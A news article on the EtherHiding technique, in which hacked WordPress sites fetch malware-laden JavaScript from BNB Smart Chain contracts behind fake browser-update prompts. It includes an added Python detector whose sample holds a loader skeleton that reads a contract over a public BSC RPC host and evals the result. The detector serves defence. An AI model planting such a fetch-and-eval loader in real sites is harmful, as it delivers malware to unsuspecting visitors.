Despite the name “EtherHiding,” the new attack vector that hides malicious code in blockchain smart contracts has little to do with Ethereum at all, cybersecurity analysts have revealed.
As reported by Cointelegraph on October 16, EtherHiding was discovered as a new way for bad actors to hide malicious payloads inside smart contracts, with the ultimate goal of distributing malware to unsuspecting victims.
These cybercriminals tend to prefer using Binance’s BNB Smart Chain, it is understood.
Joe Green, a security researcher at blockchain security firm CertiK, told Cointelegraph that most of this is due to the lower costs of BNB Smart Chain:
“The handling fee of BSC is much cheaper than that of ETH, but the network stability and speed are the same. Because every update of the JavaScript payload is very cheap, it means there is no financial pressure.”
EtherHiding attacks begin with hackers compromising WordPress websites and injecting code that pulls partial payloads stored in smart contracts on BNB Smart Chain. The site’s front end is replaced with a fake browser-update prompt which, when clicked, fetches the JavaScript payload from the BNB Smart Chain blockchain.
The actors frequently swap the malware payloads and rotate website domains to avoid detection. This lets them keep serving visitors fresh malware downloads disguised as browser updates, Green explained.
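The loader pattern described above, reading a contract over a public BNB Smart Chain RPC endpoint and executing whatever comes back, leaves recognisable traces in a compromised page. The following detector is an added example written for this article, not code from Cointelegraph, CertiK or 0xScope; the RPC hostnames, chain ID and indicator names it matches on are assumptions, and the sample page is constructed with a placeholder contract address.

```python
import re
from html.parser import HTMLParser

# Assumed indicators (not from the article): an injected loader reaches the chain
# via a public BSC JSON-RPC host or chain ID 56, reads a contract with eth_call,
# and hands the returned string to a dynamic-execution sink.
BSC_RPC_HOSTS = ("bsc-dataseed", "binance.org")
CHAIN_ID = re.compile(r"chainId\s*[:=]\s*['\"]?(56|0x38)\b")
RPC_READ = re.compile(r"eth_call|\.call\(")
DYNAMIC_EXEC = re.compile(r"\beval\(|new Function\(|document\.write\(|createElement\(['\"]script")

class ScriptCollector(HTMLParser):
    """Collect the body of every inline <script> element in a page."""
    def __init__(self):
        super().__init__()
        self.scripts, self._in_script = [], False
    def handle_starttag(self, tag, attrs):
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script and data.strip():
            self.scripts.append(data)

def score_script(js: str) -> list[str]:
    """Return the EtherHiding-style indicators present in one inline script."""
    hits = []
    if any(h in js for h in BSC_RPC_HOSTS) or CHAIN_ID.search(js):
        hits.append("bsc_endpoint")
    if RPC_READ.search(js):
        hits.append("contract_read")
    if DYNAMIC_EXEC.search(js):
        hits.append("dynamic_exec")
    return hits

def scan_page(html: str) -> list[list[str]]:
    """Flag only scripts that show all three indicators together (chain read + exec)."""
    collector = ScriptCollector()
    collector.feed(html)
    required = {"bsc_endpoint", "contract_read", "dynamic_exec"}
    return [h for h in map(score_script, collector.scripts) if required <= set(h)]

# Constructed sample: one benign analytics script and one loader skeleton that
# mimics the described pattern (placeholder address, no real payload).
SAMPLE = """<html><body>
<script>window.dataLayer = window.dataLayer || []; dataLayer.push({event:'view'});</script>
<script>
const req = {jsonrpc:"2.0", method:"eth_call", id:1,
             params:[{to:"0xPLACEHOLDER_CONTRACT", data:"0x"}, "latest"]};
fetch("https://bsc-dataseed.binance.org/", {method:"POST", body:JSON.stringify(req)})
  .then(r => r.json()).then(j => eval(hexToStr(j.result)));
</script></body></html>"""

if __name__ == "__main__":
    print(scan_page(SAMPLE))  # [['bsc_endpoint', 'contract_read', 'dynamic_exec']]
```

Run it against the rendered HTML of a suspect WordPress page; a hit on all three indicators in one script is a strong signal, while the benign analytics script scores nothing.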
Another factor, according to security researchers at Web3 analytics firm 0xScope, could be the increased security-related scrutiny on Ethereum.
“While we will likely never know the true motives of the EtherHiding hacker for using BNB Smart Chain over other blockchains for their scheme, one possible factor is the increased security scrutiny on Ethereum.”
Hackers may face higher risks of detection by injecting their malicious code using Ethereum because of systems like Infura’s IP address tracking for MetaMask transactions, they said.
The 0xScope team told Cointelegraph that they recently traced the flow of money between hacked addresses on BNB Smart Chain and Ethereum.
Key addresses were linked to users of the NFT marketplace OpenSea and to Copper custody services, it reported.
Payloads were updated daily across 18 identified hacker domains. This sophistication makes EtherHiding difficult to detect and stop, the company concluded.